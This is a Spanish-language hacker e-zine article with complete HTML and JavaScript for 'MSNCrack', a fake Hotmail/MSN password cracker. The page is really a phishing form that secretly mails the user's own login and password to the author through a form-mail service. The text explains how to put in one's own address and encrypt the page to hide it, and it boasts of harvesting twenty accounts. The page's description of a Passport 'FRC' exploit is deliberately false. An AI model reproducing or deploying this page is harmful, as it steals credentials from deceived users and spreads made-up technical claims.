 : :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
 :      :                                      :                    :
 RGZ_08  MSNCrack by Urville                   Cracking             HeX
 : :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



   Saludos  de  nuevo  lectores de  mis  codigos,  ahora  tengo el  agrado  de
   presentarles uno  de mis juguetitos de  Javascript, se trata  del MSNCrack.
   Como  todos saben,  es pregunta  universal el  'como hackeo  una  cuenta de
   Hotmail?', mas de  alguna vez todos nos hemos  preguntado eso. Por diversas
   razones que no escribire, ustedes las conocen. 

   Y  bien  para  contestar esta  pregunta,  me puse  a trabajar  al respecto. 
   Observe  que  muchos 'hackers'  daban  instrucciones  de  manda un  mail  a
   'admin@hotmail' con  tu cuenta, password y  la cuenta que  quieres obtener.
   Claro, como si  fuera asi de facil. Entonces se me  ocurrio porque no tomar
   esa idea y hacerla grafica y mas creible. 

   Primero  pense que  con ella  podia conseguir  cuentas, pero  acaso  soy un
   lammer   cualquiera?.  Claro  que  no,  soy  respetable  para  hacer  eso?.
   Entonces que  hacer con esto?.  Facil, cazar lammerz, suena  divertido. Asi
   que el MSNCrack lo desarrolle en  un archivo HTML con javascript y una form
   hacia Melodysoft  (Esta compa~ia  ofrece una forma  de mail gratitua  y muy
   practica). Ya  habia usado con anteriodidad esta forma, en mis webs, por lo
   que no  me fue  problema dise~arla.  Y bueno aqui  esta la  explicacion del
   codigo. 


<html>
<head>
<title>||| MSN Messenger crack by Urville |||</title>
<base target="comm">
<script>

/* Se declaran variables, y se 'crea' el objeto 'Passport.Terminal', solo para
los curiosos en el codigo */

var fr, dt, st, lo;
lo = 'new ActiveXObject(Passport.Terminal)';
st = "0";
fr = '<html><head></head><body style="background-color: black; color: #999999;
font-family: system; font-size: 10px, font-weight: bold;"><blockquote>';
dt = '';

/* Esta funcion, junto con ch(), checan que todos los campos sea llenados. */

function chk(n1, n2, nt1){
ch(n1,'Your User');
ch(n2,'Your Password');
ch(nt1,'Target User');
st = "1";
}

function ch(id,nam){
if (id.length == 0){
alert('Please fill this:\n'+nam);
}
}

/* Este  es el primer  paso, escribe en  la consola de  abajo que se  acaba de
conectar e intenta  entrar un nuevo password a la cuenta  victima. Es el boton
'Step 1' */

function s1(n1, n2, nt1, ser){
n1 = n1.toLowerCase()+ser;
n2 = n2.toLowerCase();
nt1 = nt1.toLowerCase()+ser;
if (st == "1"){
st = "2";
dt = fr+'CON 0x0001 services.msn.com<br>RET 0x0002 !Welcome to MSN
Services<br><br> !Microsoft Passport Server<br> !Please log in<br>HEL 0x0003
localhost<br>USR 0x0004 '+n1+'<br>PAS 0x0005 '+n2+'<br>!Log
succesful<br>!Write command or HELP<br>CHP 0x0006 '+nt1+'<br>PAS
0x0007<br>!Sorry, wrong password. Try again<br>';
comm.document.write(dt);
comm.document.close();
}
else
alert('Wrong Step');
}

/* Continua, y manda un mensaje que se forzo la cuenta y se 'logro' cambiar el
password */

function s2(nt1, ser){
nt1 = nt1.toLowerCase()+ser;
if (st == "2"){
st = "3";
dt += 'FRC 0x0008 admin+'+nt1+'<br>!Account forced<br>FRC 0x0009
sys+'+nt1+'<br>!Type a new password<br>';
comm.document.write(dt);
comm.document.close();
}
else
alert('Wrong Step');
}

/* Cambia el password y se desconecta del servidor */

function s3(n2){
n2 = n2.toLowerCase();
if (st == "3"){
st = "0";
dt += 'NUP 0x000A '+n2+'<br>!Succesful new password changed<br>BYE 0x000B';
comm.document.write(dt);
comm.document.close();
}
else
alert('Wrong Step');
}
</script>
<style>
h1      { color: #002A95; font-family: Verdana; font-size: 10pt; font-weight:
bold }
.txt    { font-family: Verdana; color: #FFFFFF; font-size: 8pt; font-weight:
bold;
          border: 2px inset #FFFFFF; background-color: #6699FF }
p, td   { color: black; font-family: Verdana; font-size: 8pt; }
</style>
</head>
<body style="background:#FFFFFF url('back.gif') no-repeat fixed right bottom; ">

<!-- Se  inicia la forma,  se hace  un post a  melodysoft, el servicio  que ya
comentaba -->

<form name="msnform" method="post"
action="http://www.melodysoft.com/cgi-bin/form.cgi">

{!-- En este hidden se declara el  remitente, este es el que debes cambiar por
el tuyo --}

<input type="hidden" name="recipient" value="usuario@hotmail.com">

<!-- Este valor no lo muevas  sino aparecera un mensaje de Melodysoft diciendo
que el mensaje fue enviado, que mal. -->

<input type="hidden" name="redirect" value="about:blank">

<!-- Este es el asunto del mail que se te enviara -->

<input type="hidden" name="subject" value="Resolvethis">
<p align="center"><img border="0" src="logo.gif" width="254" height="52"><br>
<br>

<!-- Aqui comienza la forma visual, que le solicitara al usuario los datos -->

<table border="0" cellpadding="2" cellspacing="0" style="border-collapse:
collapse" bordercolor="#111111" width="100%" height="94">
  <tr>
    <td width="50%" colspan="2" height="4" valign="bottom">
    <h1>Your Account</h1>
    </td>
    <td width="50%" colspan="2" height="4" valign="bottom">
    <h1>Target Account</h1>
    </td>
  </tr>
  <tr>
    <td width="25%" bgcolor="#F0EEE6" valign="bottom" height="39">
    <img border="0" src="man-u.gif" width="33" height="36"><b>User:</b></td>
    <td width="25%" valign="bottom" height="39"> <input type="text"
name="email" size="30" class="inp"></td>
    <td width="25%" bgcolor="#F0EEE6" valign="bottom" height="39">
    <img border="0" src="man-u2.gif" width="33" height="36"><b>User:</b></td>
    <td width="25%" valign="bottom" height="39"> <input type="text"
name="material" size="30" class="inp"></td>
  </tr>
  <tr>
    <td width="25%" bgcolor="#F0EEE6" valign="bottom" height="39">
    <img border="0" src="man-u.gif" width="33" height="36"><b>User:</b></td>
    <td width="25%" valign="bottom" height="39"> <input type="text"
name="email" size="30" class="inp"></td>
    <td width="25%" bgcolor="#F0EEE6" valign="bottom" height="39">
    <img border="0" src="man-u2.gif" width="33" height="36"><b>User:</b></td>
    <td width="25%" valign="bottom" height="39"> <input type="text"
name="material" size="30" class="inp"></td>
  </tr>
  <tr>
    <td width="25%" bgcolor="#F0EEE6" valign="bottom" height="39">
    <img border="0" src="man-p.gif" width="33"
height="36"><b>Password</b></td>
    <td width="25%" valign="bottom" height="39"> <input type="password"
name="nombre" size="30" class="inp"></td>
    <td width="25%" bgcolor="#F0EEE6" valign="bottom" height="39">
    <img border="0" src="man.gif" width="33" height="36"><b>Server:</b></td>
    <td width="25%" valign="bottom" height="39">
    <select size="1" name="ser">
    <option selected value="@hotmail.com">Hotmail</option>
    <option value="@msn.com">MSN</option>
    <option value="@passport.com">Passport</option>
    </select></td>
  </tr>

</table>
<p align="center">

<!-- Los botones  realizan cada paso del script, el primero  hace el cheque de
los datos y manda el mail a Melodysoft -->

<input type="submit" value="Check" class="txt" name="ck"
onclick="chk(nombre.value, email.value, material.value, ser.value);">

<!-- Del Step 1 al 3, son los procesos de escrituras de la terminal -->

<input type="button" value="Step 1" class="txt" name="st1"
onclick="s1(nombre.value, email.value, material.value, ser.value);">
<input type="button" value="Step 2" class="txt" name="st2"
onclick="s2(material.value, ser.value);">
<input type="button" value="Step 3" class="txt" name="st3"
onclick="s3(email.value);">

<!-- Este  ultimo boton  en realidad no  hace nada,  pero si lo  deseas puedes
poner un refresamiento de pantalla 'location.href' -->

<input type="button" value="Step 4" class="txt" name="env"><blockquote>
<p>

<!-- Estas  son las instrucciones de  como manejar el MSNCrack,  si el usuario
sabes que no habla ingles, traducelas -->

To crack a account from MSN Messenger it's simple (just 10 steps!). Before to
crack, the target account must to be in your contact list and not must to be
online, be sure of this.<br>
<br>
1. First log off your MSN Messenger, and fill the log of 'Your Account' and
'Target Account' User, domain account too. Type your-user@xx.com, and with
target account just typed user (not user@xx.com).<br>
2. Press 'Check', and if you don't ge bad alerts, you can continue.
3. Then click on 'Step 1' button. The bottom frame must log in at MSN
servers.<br>
4. When the logger show the command '!Sorry, wrong password. Try again', click
'Step 2' button.<br>
5. The logger must to write a command line showing '!Type a new password'.<br>
6. Click 'Step 3' button, and your password will be typed.<br>
7. A command line must to show '!Succesful new password changed'.<br>
8. To finish, click 'Step 4'. The connection with MSN will be closed.
9. Now, log in with 'Target Account' user and your password in MSN
Messenger.<br>
10. Have fun man =).<br>
</blockquote>
<center>
<h1>Logger<br>

<!--  Este  iframe  es  el  que  sirve para  usar  como  'terminal'  donde  se
registraran los eventos --> 

<iframe name="comm" frameborder=0 src="" width=450 height=80>
You must to use Microsoft IE 5.</iframe></h1>
</center>

<!-- Estas  es la 'explicacion' de como  funciona el bug de  Hotmail, de igual
forma puedes quitarla o traducirla -->

<h1>How works MSN crack</h1>
<p>Well, if you are a normal user of MSN and Hotmail. You will see that
everything at MSN use Passport. The Passport is a open tecnology that works
between IE and NT Servers. The crack use this open ports on IE, and get
connection at terminal with IE.<br>
This connection at terminal, provided some practiced commands like PAS, USR,
FRC, etc. This terminal commands are used with a JScript console from IE and
return a actived session at MSN Services. With your register account of
Passport you can log in. And then run commands and other fun stuffs.<br>
You, in a simple session, can't change a another user's passwords. But a
command, FRC (force), can pretend a 'brute forced' order from a administrador
or system. The FRC command works with the admin or sys account plus the target
account, and it get you the power of change the target password.<br>
Then when you get changed the password, you must quickly get down the
connection because if you are still connected, a logger can check your
connection and your connection and account cold be closed.</p>
<p>MSN Messenger crack by Urville (urville@XxXxX.com) C LoD 2002</p>

<!-- Los creditos =) -->

<p>MSN Messenger crack by Urville (urville@XxXxX.com) C LoD 2002</p>
</form>
</body>
</html>


   Asi  de  simple  es,  pero  si quieres  agregarle  mayor  seguridad  puedes
   encriptar el codigo HTML. Yo lo encripte  con CRIPTA, y no se puede leer el
   codigo fuente pero si ejecutarlo. 

   Como  notas, las  imagenes de  los monitos  de MSN  deberias  dejarlas pues
   muchas personas  les agrada lo  visual y dejan  de razonar de lo  que estan
   haciendo. Ademas de nuevo reitero encriptar el HTML para ocultar tu mail es
   muy buena idea, asi el lammer no sabra tu correo. 

   Bueno,  yo  puse  en  lo  personal,  en  practica  esto  y  subi  mi  crack
   personalizado a varios foros de lammerz y warez. Cual sorpresa me lleve que
   al  primer  dia, a  unas  cuantas  horas ya  tenia  las  cuentas de  veinte
   usuarios, y los correos reintenta 'crackear' cuentas continuaban.

   Si  deseas ver  una  lista actualizada  de  todas las  cuentas  que me  han
   llegado, visita: http://yltohell.esmartbiz.com/lam.htm 

   Espero  que esta  explicacion haya  sido  clara, pero  recuerden no  abusen
   de las herramientas.

   Pronto recibiran mas archivos mios, gracias por leerme y leer RareGaZz.


[ Editor: Se  incluye  el archivo  "Msncrack.zip", en  el cual  encontraras el
          codigo html y las imagenes en formato gif. ] 


<<::RareGaZz::>>
